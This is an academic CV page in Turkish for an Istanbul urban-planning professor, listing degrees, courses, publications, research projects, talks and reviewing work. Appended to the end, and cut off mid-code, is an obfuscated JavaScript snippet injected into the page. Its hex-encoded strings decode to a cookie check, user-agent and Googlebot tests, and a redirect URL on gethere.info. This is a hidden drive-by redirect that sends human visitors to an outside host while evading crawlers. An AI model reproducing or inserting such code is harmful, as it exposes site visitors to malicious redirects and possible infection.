Prof. Dr. Arzu KOCABAAz DA�REN

MSGSÜ Fındıklı Kampüsü
Mimarlık Fakültesi / Şehir Bölge Planlama Bölümü / Kentsel Koruma ve Yenileme Bilim Dalı0 212 252 1600/298
Arzu.kocabas@msgsu.edu.tr
kocabaa45@gmail.com
EĞİTİMDoktora
London South Bank University, 00'
Tez: "Urban Conservation Planning and Development Outcomes in Conservation Areas in Central Istanbul and Central London: 1969-1989"

Yüksek Lisans
Mimar Sinan Üniversitesi, 89'
Tez: "İngiltere’de Kentsel Koruma Yöntemi ile Pratiği Üzerine bir Araştırma ve Ülkemiz için Kentsel Koruma Yaklaşım Denemesi"

Lisans
İstanbul Teknik Üniversitesi, Taşkışla Mimarlik Fakültesi, 84'
ARAŞTIRMA ALANLARISürdürülebilir Yeşil Kentsel Koruma
Sürdürülebilir Yeşil Kentsel Dönüşüm
Düşük karbonlu yerleşmeler
Uluslar arası karşılaştırmalı çalışmalar
VERDİĞİ DERSLER2013-2014 Bahar

• Korumada Araştırma, Uygulama, Yöntem ve Teknikler (Y. Lisans, Z) (bkz. Ders Rehberi)
• Kentsel Koruma ve Yenileme Atölyesi (Y. Lisans, Z) (bkz. Ders Rehberi)
• Built Heritage: Progress & Prospects (Şehircilik Doktora, S) (bkz. Ders Rehberi)
• Ekistiks: İnsan Yerleşmeleri Bilimi (Y.Lisans, s) (bkz. Ders Rehberi)
• Kültürel Miras Yönetimi (Lisans, Z) (bkz. Ders Rehberi)
• Kentsel Planlama ve Kentsel Tasarım II (Mim. Fak. Lisans, Z)


2012-2013 Güz

• Sürdürülebilir Kentsel Yenileşme (Y. Lisans, S) (bkz. Ders Rehberi)
• Kentsel Gelişmeyi İnceleme ve Yönlendirme Atölyesi (Y. Lisans, Z)
• Kentsel Dönüşüm: kavram, kuram ve uygulama (Lisans, S) (bkz. Ders Rehberi)
• Kentsel Planlama ve Kentsel Tasarım I (Mim. Fak. Lisans, Z)
YAYINLAR / BİLDİRİLERUluslararasi Hakemli Dergilerde Yayımlanan Makaleler

Kocabas, A., ‘The transition to low carbon urbanisation in Turkey: emerging policies and initial action’, Başlıca Eser, Habitat International, Available online 28 February 2012, ISSN 0197-3975, 10.1016/j.habitatint.2011.12.016.
(http://www.sciencedirect.com/science/article/pii/S0197397511001135), Elsevier, 2012.

Kocabas, A. and Gibson, M. ‘Planned gentrification in Istanbul: the Sulukule Renewal Area 2005-2010’, the International Journal of Sustainable Development Planning, vol. 6, no.4, ISSN: 1743-7601 (print), ISSN: 1743-761X (online), WIT Press, UK, 2011.

Kocabaş, A., ‘Urban Conservation in Istanbul: Evaluation and Re-conceptualization’, Habitat International, A Journal of the Study of Human Settlements, Elsevier, vol. 30, pp. 107-126, 2006, ISSN 0197-3975, 10.1016/j.habitatint.2004.08.001.
(http://www.sciencedirect.com/science/article/pii/S0197397504000803).

Kocabaş, A., ‘The Emergence of Istanbul’s Fifth Urban Planning Period: A Transition to Planning for Sustainable Urban Regeneration’, Journal of Urban Technology,vol. 12, no. 2, pp. 27-48, ISSN: 1063-0732 paper / ISSN: 1466-1853 (online), Taylor & Francis Group: Routledge, 2005.

Uluslararası Bildiriler

Kocabas, A., Gibson, M. and Diren, M., ‘From carbon intensive sprawl towards low carbon urbanisation: progress and prospects for Istanbul’, AESOP 2012, 26th Annual Conference, Track 16-A: Sustainable development and planning practice -1, METU, Ankara, Turkey, 11-15.07.2012.

Kocabaş, A., ‘Yeşil sürdürülebilir kentsel dönüşüm: kavramsal çerçeve ve uygulama araçları’; Böke, E. (ed.) 24. Uluslararası Yapı ve Yaşam Kongresi: Dönüşüm – yaşama ve mekana etkileri, Bursa Uluslararası Fuar ve Kongre Merkezi, Bursa TMMOB Mimarlar Odası, Bursa, 2012, ISBN 978 605 01 0339 7.

Diren, M., Gibson, M. and Kocabas, A., ‘Low carbon cities: the experience of Brighton and Hove, UK and prospects for Kartal, Istanbul, Turkey’, GreenAge II Symposium: Sustainable Society and Green Economy, MSFAU, Istanbul, Turkey, 26-27.04.2012.

Aygün, B. ve Kocabaş, A. (2011) C40 kentleri, Avrupa’nın yeşil başkentleri ve İstanbul’a ilişkin çıkarımlar, KBAM 2. Sempozyumu: Planlamanın dünü, bugünü, yarını: planlamada yeni söylem arayışları, Ankara: ODTU.

Kocabas, A. and Doğan Aygün, K. B., ‘C40 Cities Climate Change Action Plans and prospects for Istanbul’, GreenAge, 1st International Symposium, MSGSÜ, İstanbul: 6-8.12.2010.

Kocabas, A., ve diğerleri, ‘Towards low carbon housing development and eco-retrofitting in Istanbul - Arnavutkoy’, International Congress: Rahabilitation and sustainability – the future is possible, Barcelona, Spain, 4-6,10.2010.

Kocabaş, A. ve diğerleri, ‘Planning for low carbon development: evolving experience in England and emerging issues in Turkey’, 10th Sharjah International Urban Planning Symposium on Capital Cities, Wicked Problems: Best Practices in Planning and Policy Response Mechanisms, University of Sharjah, United Arab Emirates, 23-25 November 2008.

Ozaydin, G. and Kocabas, A. ‘Urban design as a necessary tool for developing projects in keeping with the traditional context: assessment of urban projects in Istanbul’, Rehabimed - Euro-Mediterranean Regional Conference: Traditional Mediterranean Architecture: present and future, Barcelona, July 12-15, 2007.

Kocabas, A. ‘New approaches to urban conservation: international guidelines and challenges for Istanbul’, Rehabimed - Euro-Mediterranean Regional Conference: Traditional Mediterranean Architecture: present and future, Barcelona, July 12-15, 2007.

Kocabaş, A., ‘Urban Regeneration in Istanbul – Strategic Approach Emerging Through Pilot Programmes’, in the Proc. XXII. World Congress of Architecture - Cities: Grand Bazaar of Architectures, UIA, Istanbul, July 2005.

Kocabaş, A., ‘Urban Regeneration in Turkey – Challenges of Co-ordination and Integration’, in the Proc. 8th Sharjah International Urban Planning Symposium on Federalism and Strategic Planning Co-ordination, University of Sharjah, UAE, April 2005.

Kocabaş, A., ‘Implementing Urban Design in the Context of the New London Plan’, proceedings of the Proc. 15th International Urban Design and Implementation Symposium on Urban Design in Change-Change in Urban Design, Mimar Sinan Güzel Sanatlar Üniversitesi, Istanbul, May 2004.

Kocabaş, A., ‘The Emergence of Istanbul’s Fifth Planning Cycle’, Proc. 7th Sharjah International Urban Planning Symposium: Cities in the Postmodern Age – Coordination, Networking Regional Development, University of Sharjah, 391-400, UAE, April 2004.

Gibson, M. & Kocabaş, A., ‘Improving Prospects for the Regeneration of Deprived Neighbourhoods in Turkey’, Proc. International Gazimağusa Symposium, Medi-Triology: Time To Speak, Eastern Mediterranean University, 137-145, Gazimağusa, ISBN 975-8401-16-5, North Cyprus, April 2004.

Kocabaş, A., ‘Globalisation, Earthquake Resistance, EU Harmonization and the Re-conceptualisation of Conservation Planning in Istanbul’, Proc. International Gazimağusa Symposium, Medi-triology: Time To Speak, Eastern Mediterranean University, 388 – 395, Gazimağusa, ISBN 975-8401-16-5, North Cyprus, April 2004.

Kocabaş, A., ‘Sustainable Community Buildings In London And Issues For Istanbul’, Proc. 14th International Urban Design and Implementation Symposium on Urban Regeneration and Urban Design, Mimar Sinan Universitesi, 133-140, MSU, ISBN 975-7634-58-1, Istanbul, Mayıs 2003.

Kocabaş, A., ‘Sürdürülebilir Mahalle Yenileşmesi ve Koruma Stratejileri’, Proc. International Symposium on Sustainable Neighbourhood Regeneration in Istanbul as part of EU Harmonization Process and Earthquake Resistant Housing Development, Mimar Sinan Universitesi Oditoryumu, 166-170, MSU, Istanbul, 24-25.10.2002.

Gibson. M. & Kocabaş, A., ‘London: Sustainable Regeneration: Challenge and Response’, Proc. 1st International Urban Design Symposium, Mimar Sinan University, 177-228, MSU, ISBN 975-7634-51-4, Istanbul, September 2001.

Gibson, M. & Kocabaş, A., ‘Turkish Planning at the Crossroads: False Dawn or Vision of New Era?’ Proc. 3rd Sharjah International Urban Planning Symposium, University of Sharjah, UAE, April 2001.

Kocabaş, A., ‘Urban Conservation Planning, Mayoral Vision And Development Outcomes In Central Istanbul’, Proc. 3rd Sharjah Urban Planning Symposium, Vision Planning in the Age of Globalisation, the role of Cities in the Global & Regional Economy, University of Sharjah, UAE, April 2001.

Kocabaş, A.,‘Urban Conservation: A Framework For The Cross-National Comparative Study’, Proc. VIII Association of European Schools of Planning Congress on Planning for a Broader Europe, Istanbul, Turkey, August 1994.

Kocabaş, A., ‘Urban Conservation for Sustainable Development: Towards A Research Agenda’, Proc. 11th Interschools Conference, IoAAS, University of York, 55-62, York, March 1994.

Uluslararası Kitap / Kitaplarda Bölümler

Kocabas, A., ‘Climate change, environmental sustainability and the future development of Istanbul’, Leal, W. (ed.) Climate Change Handbook, Springer, in press.

Kocabas, A., ‘Environmental sustainability and the future development of Istanbul’, Kartaler, Y. (ed.) Making a sustainable city: the Arnavutkoy approach, Istanbul: Arnavutköy Belediyesi, October 2012.

Kocabas, A., ‘Çevresel Sürdürülebilirlik ve İstanbul’un Kentsel Gelişmesi’, Kartaler, Y. (ed.) Sürdürülebilir kent yapmak: Arnavutköy İlçesi yaklaşımı, Istanbul: Arnavutköy Belediyesi, Ekim 2012.

Kocabas, A., ‘Urban conservation and regeneration in Istanbul’s Historic Peninsula: progress and new challenges’, Pacetti, Mm; Passerini, G.; Brebbia, C. A. and Latini, G. (ed.s) The sustainable city VII: urban regeneration and sustainability, UK: WIT Press, May 2012, Set ISBN: 978-1-84564-578-6 and Set eISBN: 978-1-84564-579-3.

Kocabas, A., ‘Waste management in the UK / London and Turkey/Istanbul: policy issues and implementation’, Ergonul, S.; Kocabas, A. and others (ed.s) GreenAge: approaches & perspectives towards sustainability, İstanbul: MSGSU, 2012.

Kocabaş, A. ‘Urban regeneration in England: investment partnerships case studies’, First Edition, 2011 Housing Convention: Innovative housing approach, strategies, implementations and urban transformation – urban transformation rally for a natural disaster risk free Turkey, Istanbul: YEM, June 2012.

Kocabaş, A. ‘İngiltere’de kentsel yenileme: yatırım ortaklığı durum incelmeleri’, Birinci Baskı, 2011 Konut Kurultayı: Konutta yeni yaklaşımlar, stratejiler, eylemler ve kentsel dönüşüm – doğal afetlere hazırlıklı bir Türkiye için kentsel dönüşüm seferberliği, İstanbul: YEM, Haziran 2012.

Kocabas, A., ‘Regeneration of Kartal: challenges, opportunities and prospects for the future’, Brebbia, C. A.; Hernandez, S. and Tiezzi, E. (ed.s) The sustainable city VI: urban regeneration and sustainability, UK: WIT Press, ISBN: 978-1-84564-432-1, April 2010.

Kocabaş, A., Urban conservation planning and practice in London and Istanbul: case studies of Beyoglu and Covent Garden, 1969-1989, LAP, Blackwell, ISBN: 978-3-8383-3754-8-3, 2010.

Kocabas, A., ‘Cumhuriyet Dönemi İstanbul'unda Yeni Semtler ve Mahalleler, Başar, F. (ed.) Kültürler başkenti İstanbul, TKHV, ISBN 978-975-7522-29-4, İstanbul, 2010.

Kocabas, A., ‘New districts and neighbourhoods in the Republican Istanbul’, Başar, F. (ed.) İstanbul: Capital of cultures, TKHV, ISBN 978-975-7522-30-0, Istanbul, 2010.

Gibson, M. & Kocabaş, A., ‘Türkiye’de planlama yol ayrımında: sahte bir şafak mı yoksa yeni bir dönemin vizyonu mu?’, Mengi, A. (ed.) Kent ve planlama: geçmişi korumak geleceği tasarlamak, Ruşen Keleş’e Armağan Dizisi, vol. II, çeviren: Kocabaş, A., s. 443-480, Ankara: İmge Kitabevi, ISBN 978–975-552-0 (Tk. No) ve 978–975-555-1 (2.Cilt), 2007.

Gibson, M. & Kocabaş, A., ‘Turkish planning at a crossroads: false dawn or vision of new era?’, Mengi, A. (ed.) Kent ve planlama: geçmişi korumak geleceği tasarlamak, Ruşen Keleş’e Armağan Dizisi, vol. II, pg. 165-201, Ankara: İmge Kitabevi, ISBN 978-975-533-555-1 (2. Cilt), 2007.

Kocabaş, A. Kentsel dönüşüm (yenileş(tir)me: İngiltere deneyimi ve Türkiye’deki beklentiler, İstanbul: Literatür, ISBN 975-04-0393-2, 2006.

Kocabaş, A., Neighbourhood Regeneration: English Practice and Turkish Prospects, London South Bank University, London, ISBN: 1874418 – 53 – 5, 2005.

Ulusal Makale / Bildiri / Diğer Yazılar

Kocabas, A., ‘Cami Mimarisinde Çağdaş Tasarım ve Teknolojiler: Eko Camiler ve Uluslar arası Öncü Örnekler’ (özet), 1. Ulusal Cami Mimarisi Sempozyumu: Gelenekten geleceğe cami mimarisinde çağdaş tasarım ve teknolojiler, MSGSU, İstanbul, Ekim 2012.

Kocabas, A., ‘Düşük karbonlu kentleşme: Türkiye’nin gündemi ve yerel ölçekteki adımlar’, KBAM 2. Kentsel ve Bölgesel Araştırmalar Sempozyumu, ODTÜ, Ankara, 8-9.12.2011.

Aygün Doğan, B. and Kocabas, A., C40 kentleri, Avrupa’nın yeşil başkentleri ve İstanbul’a ilişkin çıkarımlar’, KBAM 2. Kentsel ve Bölgesel Araştırmalar Sempozyumu, ODTÜ, Ankara, 8-9.12.2011.

Kocabas, A., ve diğ. ‘8. Tema: Konut, gayrımenkul, kentsel dönüşüm ve yenileme raporu’, KBAM 1. Arama Konferansı, ODTÜ, Ankara, 20-21.09.2010.

Kocabas, A. ‘Düşük karbonlu ekonomiye doğru Türkiye’, Dünya Gazetesi – Yorum İnceleme, 06.02.2010.

Kocabas, A. ‘Geleceğin evleri eko evler olacak’, Dünya Gazetesi – Yorum İnceleme, 26.1.2010.

Kocabaş, A., ‘Pasif ev’den ‘aktif ev’e’, Sağlık Çevre Kültürü Dergisi, sayı 4, Zeytinburnu, İstanbul, 2010, ISSN: 1308-4054.

Kocabaş, A., ‘‘Clinton İklim Girişimi’ ve Yerel Sorumluluklarımız’, Dünya Gazetesi – Yorum İnceleme, 16.04.2007.

Kocabaş, A., ‘Londra’da Kentsel Yenileşme / Dönüşüm Uygulaması: Toplum Gelişme Kurumlarının Rolü’, Mimarist, üç aylık mimarlık kültür dergisi, yıl: 5, sayı: 18, İstanbul: 2005.

Kocabaş, A., ‘Implementing Urban Regeneration in London: the Role of Community Development Trusts’, in the Proc. Dünya Şehircilik Günü, 28. Kollokyumu: Değişen Dönüşen Kent ve Bölge, TMMOB Şehir Plancıları Odası ve ODTÜ Şehir ve Bölge Planlama Bölümü, Ankara, Kasım 2004.

Kocabaş, A., ‘Adana Vision Project and European Regional and Urban Development Context’, proceedings of the Urban Vision Atelier Conference Series, Adana, Turkey, November 2001.

ARAŞTIRMA PROJELERİUluslararası Araştırma Projeleri

JTP ve Kartal Belediyesi Destekli Araştırma Projesinde Proje Koordinatörü: Kartal için bir vizyon ve stratejik gelişme (/kalkınma) çerçevesi, Kartal Belediyesi ve JTP, Proje Koordinatörü, çeviri: Kocabas, A., İstanbul, May 2006.

JTP ve Kartal Belediyesi Destekli Araştırma Projesinde Proje Koordinatörü: Kartal LA and JTP, A vision and strategic development framework for Kartal / Kartal için bir vizyon ve stratejik gelişme (/kalkınma) çerçevesi, Kartal Belediyesi ve JTP, Proje Koordinatörü, İstanbul, May 2006.

LSBU-İBB-Tribal Destekli Araştırma Projesinde Proje Koordinatörü: Zeytinburnu Genel Strateji ve Eylem Planı Çerçevesi: Avrupa’daki Geleceğin İnşaa Edilmesi, çeviri, İBB-Tribal Consulting - LSBU Project, çeviri, 59Y ve KD.M.460.106, Istanbul: 2005.

LSBU-İBB-Tribal Destekli Araştırma Projesinde Proje Koordinatörü: Outline Strategy and Action Plan Framework: Building a Future in Europe, İBB-Tribal Consulting - LSBU Project, 59Y ve KD.M.460.106, Istanbul: 2005.

LSBU-İBB-MSU Destekli Araştırma Projesinde Proje Koordinatörü: Istanbul’un AB Uyum Sürecinde Deprem Gerçeğini Dikkate Alan Sürdürülebilir Mahalle Yenileşmesi için bir Strateji ve Eylem Planı, İBB-MSÜ-LSBU Projesi, 59-Y ve KD.M 460.101, çeviri: Kocabas, A., 2002-2003.

LSBU-İBB-MSU Destekli Araştırma Projesinde Proje Koordinatörü: Sustainable Neighbourhood Regeneration in Istanbul as part of EU Harmonisation Process and Earthquake Resistant Housing Development - a Strategy and Action Plan, İBB-MSÜ-LSBU Project, 59-Y ve KD.M 460.101, 2003.

LSBU Destekli Araştırma Projesinde Eş-Yürütücü: Sustainable Community Buildings Pilot Project, Civic Trust Regeneration Unit, London, 2001-2003.

LSBU Destekli Araştırma Projesinde Araştırmacı: Elephant Links Regeneration Partnership: Research Action Project, London South Bank University, Researech Fellow, 2000-2001.

LSBU Destekli Araştırma Projesinde Araştırmacı: Yalova University: an initial implementation proposal, British Earthquake Consortium for Turkey, UK, Research Officer, 2000-2001.

LSBU Destekli Araştırma Projesinde Araştırmacı: Northampton Partnership SRB1 Evaluation, Northampton City Council, UK, Research Officer, 2000.

Londra South Bank University (LSBU) Destekli Araştırma Projesinde Araştırmacı: Business Needs and Services Baseline Survey 2000, LB Southwark: Elephant and Castle Regeneration Partnership Projesi, London, Research Officer, 2000.

Ulusal Araştırma Projeleri

MSGSÜ Bilimsel Araştırma Projesi Yürütücüsü: Kentsel yayılmadan eko-yerleşmelere: Arnavutköy örneği (Proje no:201134), G. Konuk, L. Yarar, M. Diren ve G. Kadayıfçı ile M. Gibson ile birlikte, MSGSÜ, İstanbul, Ocak 2011-12.

MSGSÜ Bilimsel Araştırma Projesi Yürütücüsü: Sulukule örneği ve bir model önerisi (Proje No: 200918), L. Yarar ve H. Uluçay ile birlikte, MSGSÜ, Ocak 2009 – Ocak 2011.

Bayındırlık ve İskan Bakanlığı AB Destekli Kentleşme Şurasında Alt Komisyon Başkanı: Bayındırlık ve İskan Bakanlığı Kentleşme Şurası, ‘Kentsel dönüşüm, Konut ve Arsa Politikaları’ 3. Komisyonu Başkan Yardımcısı ve Kentsel Dönüşüm Alt Komisyon Başkanı, 2009, Ankara, (Aralık 2008-Mayıs 2009).

İBB ve MSGSÜ Destekli Araştırma Projesinde Proje Koordinatörü: İstanbul için yeni bir kentsel dönüşüm / yenileşme modeline doğru, cilt A, B ve C, Proje Koordinatörü, İstanbul: İBB, Aralık 2008.

DPT ve Koç Üniversitesi Destekli Araştırma Projesinde Proje Danışmanı: Marmara Bölgesi Otomotive Lojistik Planlaması, Proje Danışmanı, İstanbul: Koç Üniversitesi ve Otomotive Sanayi Derneği, Ağustos 2008.

MSÜ-Önce Adana Vakfı ve Adana Belediyesi Destekli Araştırma Projesinde Proje Ekibi Üyesi ve Bilimsel Komite Üyesi: Adana Kentsel Düşünce Üretme Atölyesi: Adana için bir Vizyon Belirleme Projesine Doğru, Adana Büyükşehir Belediyesi, Önce Adana Vakfı ve Mimar Sinan Üniversitesi, Proje Ekibi ve Bilimsel Komite Üyesi, 2001-2002.
ULUSLAR ARASI VE ULUSAL PANEL/ AÇIK OTURUM/ SEMİNERSunum: Kocabaş, A., ‘Kentsel Dönüşüm ve İmar Planlama Uygulamaları’, SODEV Yerel Yönetimler Okulu dersi, CHP Beylikdüzü İlçe Başkanlığı / İstanbul, 07.06.2013.

Davetli konuşmacı ve Oturum Başkanı: Kocabaş, A., ‘Kentsel dönüşüm: kavram, süreç ve İngiltere uygulama örneği’, Mersin Deniz Ticaret Odası, Liman Kentlerinde Değişimi Yönetmek, Mimarlar Odası Mersin Şubesi Konferans Salonu, Mersin, 12.03.2013.

Sunum: Kocabaş and A. SNG, ‘Urbanisation, poverty reduction and Ekistics perspective: case of Pürtelas neighbourhood, İstanbul’, WSE MEETING 2013: The cities, security and poverty, METU-HACETTEPE University, 07-09.07. 2013, Ankara.

Davetli konuşmacı: Kocabaş, A., ‘Yeşil sürdürülebilir kentsel dönüşüm: kavramsal çerçeve ve uygulama araçları’, SODEV Yerel Yönetimler Okulu ‘Dünyada ve Türkiye’de Kentsel Dönüşüm ve İmar Planlaması Uygulamaları’ dersi, Taksim / İstanbul, 03.06.2013.

Davetli konuşmacı: Kocabaş, A., ‘Yeşil sürdürülebilir kentsel yenileşme: kavramsal çerçeve ve uygulama örnekleri’, Bayburt Şehircilik Kongresi, Bayburt, 18.05.2013.

Sunum: Kocabas, A., ‘From urban sprawl to eco-settlements: prospects for Arnavutköy and Istanbul metropolitan region’ joint paper with Gibson, M. & Diren, M. delivered at the 10th Biennial of European Towns and Town Planners Conference, 18-21.09.2013, Cascais, Portekiz.

Sunum: Kocabas, A., Panelist of the Chamber of Planners Istanbul Branch, ‘Urban regeneration in Istanbul: concepts and practice’ lecture delivered to the European Union of Spatial Planning Team Members, 08.06.2012, Istanbul: MSGSÜ.

Davetli konuşmacı: Kocabaş, A., ‘Sürdürülebilir kentsel dönüşüm: kavramsal çerçeve ve İngiltere örneği’, SODEV Yerel Yönetimler Okulu ‘Kentsel dönüşüm / imar ve planlama uygulamaları’ dersi, Taksim / İstanbul, 26.04.2012.

Davetli konuşmacı: Kocabaş, A., ‘Yeşil sürdürülebilir kentsel dönüşüm: kavramsal çerçeve ve uygulama araçları’, SODEV Yerel Yönetimler Okulu ‘Kentsel dönüşüm / imar ve planlama uygulamaları’ dersi, Taksim / İstanbul, 28.11.2012.

Panelist: Kocabas, A., Panelist of the PRIO Envisioning a future: towards a property settlement in Cyprus International Conference, Nicosia, 30.09.2011.

Panelist: Kocabas, A., Panelist of the PRIO Cyprus Resettlement International Conference, London, 16-17.07.2011.

Davetli konuşmacı: Kocabaş, A., ‘Eko yerleşimler’, 29. Tarihi Türk Evleri Haftası Konferansı, Trakya’da Bir Umut: Kırklareli, Kırklareli, 09-15.05.2011.

Sunum: Kocabas, A., Presentation on ‘Waste management in the UK and Turkey: policy issues and implementation’, 2nd International Eco Forum for Waste & Water Management, Recycling Conference, Sofia, Bulgaria: 13-15.04.2011.

Tartışmacı: Kocabas, A., Kentsel ve Bölgesel Araştırma Merkezi (KBAM) 2. Arama Konferansı, ‘Planlamanın Dünü, Bugünü ve Yarını’, ODTÜ, Ankara, 8-9.12.2011.

Sunum: Kocabas, A., Presentation on ‘Urban regeneration: EU perspective and Turkish experience – challenges and prospects’, Intergeo East: Recent problems in Geodesy and related fields with international importance, Istanbul: 20-21.05.2010.

Sunum: Kocabas, A., Presentation of ‘Sustainability at a city scale’ Panel, Çedbik: BuildIST visualize tomorrow, Istanbul: 30.9.2010-3.10.2010.

Sunum: Kocabas, A., Jarvis, B ve Gibson, M., Presenation on ‘Local heritage matters’, World Society Ekistics Meetings in India: Desirable Human Settlements – Futures of Relevance, Mumbai-Pune-Aurangabad, 7-12.2010.

Seminer: Kocabas, A., ‘Recent developments in urban conservation in Istanbul’, Urban Design Seminar, London South Bank University, Londra, 18.01.2010.

Yürütücü: Kocabas, A., ‘8. Tema: Konut, gayrimenkul, kentsel dönüşüm ve yenileme’, KBAM 1. Arama Konferansı, ODTÜ, Ankara, 20-21.09.2010.

Panelist: Kocabas, A., ‘Koruma Amaçlı İmar Planlarının Yapım Süreci ve Değerlendirme İlkeleri ve Çevre Düzenleme Projelerinin Yapım Süreci ve Değerlendirme İlkeleri’, Kültür ve Tabiat VArlıklarını Koruma Bölge Kurulu Üyeleri 1. Koordinasyon Toplantısı, İstanbul, 26-28. 02.2010.

Davetli konuşmacı: Kocabaş, A., SODEV Yerel Yönetimler Okulu ‘Kentsel dönüşüm / imar ve planlama uygulamaları’ dersi, Sarıyer: İstinye, 13.10.2010.

Davetli konuşmacı: Kocabaş, A., ‘Istanbul’un mahalleleri: tarihi süreç, sorunlar ve 21. Yy a ilişkin beklentiler’, MÜSİAD Istanbul, Medeniyet ve Şehir Paneli, Istanbul: Bakırköy Cem Karaca Kültür Merkezi, 25.09.2010.

Tema eş-yürütücüsü: Kocabas, A., ‘Konut, gayrımenkul, kentsel dönüşüm ve yenileme’ konulu 8. Kentel ve Bölgesel Araştırmalar Merkezi, 1. Arama Konferansı, 20-21.09.2010, ODTÜ, Ankara: 20-21.09.2010.

Davetli konuşmacı: Kocabaş, A., ‘Kentsel Yenileş (tir)me (regeneration) üzerine çözümlemeler ve yerel yönetimlerin rolü’, SODEV Yerel Yönetimler Okulu ‘Kentsel dönüşüm ve Belediye’ dersi,Maltepe, 24.02.2010.

Sunum: Kocabas, A., Presentation of ‘Compact city of Istanbul: between traditional, modern and beyond’, World Ekistics Society Conference: the Future of urbanism – megalopolis and beyond: networking, education and interdisciplinarity, Antalya, 20-27 October 2009.

Davetli konuşmacı: Kocabaş, A., ‘Kentsel yenile(ştir)me (/regeneration) üzerine çözümlemeler ve Kartal Projesi, SODEV Yerel Yönetimler Okulu, ‘Kentsel dönüşüm ve Çevreci Belediye’ dersi, Kartal: Hasan Ali Yücel Kültür Merkezi, 02.12.2009.

Davetli konuşmacı: Kocabaş, A. ‘İstanbul’un kentsel dönüşümü üzerine’, 27. Tarihi Türk Evleri Haftası – 2010 İstanbul Konferansı, İstanbul: Hamamizade Dede Efendi Evi Salonu, 25-31.05.2009.

Davetli tartışmacı: Kocabaş, A. ‘Future Research Areas in the Field of Urban sustainability in the context of URBAN-NET’, A project funded under the 6th Framework Programme of the European Commission, TUBİTAK Tartışma Grubu, Ankara, 15.02.2008.

Sunum: Kocabaş, A., ‘The Challenge of Conservation-led Regeneration of the Istanbul Historic Peninsula’, UKTI Inward Visit, İngiltere: Londra / Glasgow, 06-09 /03/2007.

Davetli konuşmacı: Kocabaş, A., ‘Kültürel Miras ve Sosyal Kapital: Sulukule'nin Geleceğine İlişkin Değerlendirmeler’, 40 Gün 40 Gece Sulukule Programı, 21. 04. 2007 Sulukule, İstanbul.

Sunum: Kocabaş, A., ‘Three cubed Istanbul: - the past is first - Historic Peninsula: Museum City’ Presentation for the University of Nottingham, Institute of Architecture, School of the Built Environment, P 3: Three cubed (Money Space, Think Space and Live Space), Istanbul: MSGSU, 12.01.2007.

Sunum: Kocabaş, A., ‘Evolving Urban Regeneration in Istanbul – Developments At Local Level’, MSGSÜ – ZBV Zürich Association for Studies of Settlement and Transport Seminar on Urban Planning in a megacity: Istanbul, MSGSÜ Oditoryum, İstanbul, 22-24.05.2006.

Sunum: Kocabaş, A., ‘New approaches to urban conservation: UNESCO guidelines and challenges for Istanbul’, Vienna Urban Development, Conservation, Renewal and Architecture Seminar and Exhibition, MSFAÜ, Tophane-i Amire Kültür ve Sanat Merkezi, 30. 04. 2006.

Panelist: Kocabaş, A., ‘İstanbul bağlamında kentsel korumaya güncel yaklaşımlar’, Uluslararası Kentsel Koruma Rehberleri ve deneyim ile İstanbul’un karşı karşıya kaldığı zorluklar, MSGSÜ Şehir ve Bölge Planlama Bölümü, Kentsel Koruma ve Yenileme Bilim Dalı ‘Nasıl bir Koruma?’ Paneli, İstanbul: MSGSÜ Oditoryumu, 08. 06. 2006.

Sunum: Kocabaş, A., Spatial Development Planning for Urban Regeneration: The London Experience, İstanbul Üniversitesi, Hukuk Fakültesi izleyicileri için yapılan sunum, İstanbul: Marmara Üniversitesi, 24. 04. 2006.

Davetli Katılımcı: Zeytinburnu Deprem Zirvesi, İstanbul, Şubat 2003.
HAKEMLİKUluslararası Hakemli Dergide Hakemlik

The Habitat International, Ref. no. HABITATINT-D-12-00241, 02.11.2012.

Open Journal of Earthquake Research, Editorial Board Üyeliği, 30.10.2012.

Open Journal of Earthquake Research, Scientific Research Publishing, Ref. no. 2740005, 10.10.2012.

Urban Affairs Review, Sage Publications Ltd., UK: London, Reference no. MS # 1126, 07.08.2012.

International Sustainable City Conference Organising Committee, Konferans bildirilerine hakemlik, Wessex Institute of Technology, UK: Southampton, WIT, UK: 06.03. 2012.

The Habitat International – Special Issue: Low Carbon Cities and Institutional Responses Papers, HI-LCC-007, 15.10.2011.

Urban Affairs Review, Sage Publications Ltd., UK: London, Reference no. MS # 1002, 22.08.2011.

International Journal of Sustainable Development and Planning, Wessex Institute of Technology, UK: Southampton, Reference no. SDP281, WIT, UK: 19.10. 2010.

GreenAge, Mimar Sinan Güzel Sanatlar Üniversitesi, Mimarlık Fakültesi 1st International Symposium, 6-8.12.2010, Reference no. T 186, October 2010.

Journal of Land Use Policy, Reference no. LUP-D-08-00064R2, Elsevier Publication: June 2009.

Journal of Land Use Policy, Reference no. LUP-D-08-00064R1, Elsevier Publication: January 2009.

Cities, Reference no. JCIT-D-06-00001, 20.02.2006.

Ulusal Hakemli Dergide Hakemlik

İstanbul Ticaret Üniversitesi Fen Bilimleri Dergisi, 03.12F145 nolu makale değerlendirmesi, 08.08.2012.

Tasarım + Kuram, Mimar Sinan Güzel Sanatlar Üniversitesi Mimarlık Fakültesi Dergisi, Mimarlık Fakültesi yayını, 27.10.2009.

Megaron, Yıldız Teknik Üniversitesi, Mimarlık Fakültesi Dergisi, cilt: 3, sayı: 1, 06.07.2007.
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 